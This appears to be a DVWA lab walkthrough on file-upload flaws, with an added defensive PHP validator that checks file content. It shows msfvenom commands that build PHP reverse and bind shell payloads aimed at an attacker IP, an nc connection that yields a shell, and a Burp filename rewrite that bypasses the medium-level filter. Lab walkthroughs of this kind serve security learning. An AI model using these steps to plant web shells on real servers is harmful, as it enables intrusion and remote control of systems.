This article is about file upload as a security flaw. In previous articles we set up our lab and carried out several exploits against our target.
You can view those articles here.
File Upload — Low Security
$ msfvenom -h
$ msfvenom -l payloads | grep php
View more info:
$ msfvenom -p php/meterpreter/reverse_tcp --list-options
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.231.107 LPORT=4444 -o php_venom.php
Remove ‘/*’ from the beginning of the file.
$ msfvenom -p php/bind_php --list-options
$ msfvenom -p php/bind_php LHOST=192.168.231.107 LPORT=4444 -o php_bind.php
Remove ‘/*’ from the beginning of the file.
$ nc 192.168.231.110 4444
Got a shell
File Upload — Medium Security
Change DVWA Security to medium and try again.
$ cp php_venom.php php_venom.php.jpg
Try to run:
Let’s hack our file upload. Start Burp Suite with Intercept on.
Return to DVWA and upload the file again. Go to Burp and change the filename:
Then press Forward and go back to the browser to see a successful file upload. Go to hackable/upload and see php_venom.php uploaded. We’ve bypassed the medium security protection!
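The defensive side of the bypass above, as an added example that is not DVWA's code: a server-side check that ignores the filename and Content-Type sent in the request (the fields a proxy such as Burp can rewrite) and decides from the file's bytes instead. It assumes the medium-level check relies on request-supplied fields, as the Burp step implies; `safe_upload_name`, the allow-list, the size limit and the sample inputs are all constructed for illustration.

```php
<?php
// Added example, not DVWA's code; all names and limits here are assumptions.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
const MAX_BYTES = 100000;

function safe_upload_name(string $clientName, string $clientType, string $data): string
{
    // $clientName and $clientType arrive in the request and can be rewritten
    // in a proxy, so they are deliberately ignored for the decision.
    $size = strlen($data);
    if ($size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('rejected: size');
    }
    // Decide the type from the bytes themselves.
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->buffer($data);
    if (!isset(ALLOWED_TYPES[$sniffed])) {
        throw new RuntimeException("rejected: content is $sniffed");
    }
    // Random server-chosen name; the extension comes from the allow-list.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$sniffed];
}

// Constructed sample inputs: [client filename, client Content-Type, bytes].
$png = "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR" . pack('NN', 1, 1) . "\x08\x02\x00\x00\x00";
$samples = [
    ['photo.png', 'image/png', $png],
    ['notes.php.jpg', 'image/jpeg', "<?php echo 'constructed test file'; ?>"],
    ['notes.php', 'image/jpeg', "<?php echo 'constructed test file'; ?>"],
];

foreach ($samples as [$name, $type, $data]) {
    try {
        echo "$name => stored as " . safe_upload_name($name, $type, $data) . PHP_EOL;
    } catch (RuntimeException $e) {
        echo "$name => " . $e->getMessage() . PHP_EOL;
    }
}
```

Content sniffing alone does not stop a valid image that carries embedded code, so the upload directory should also be kept from executing scripts, or the image re-encoded before it is stored.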
Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another attack vector.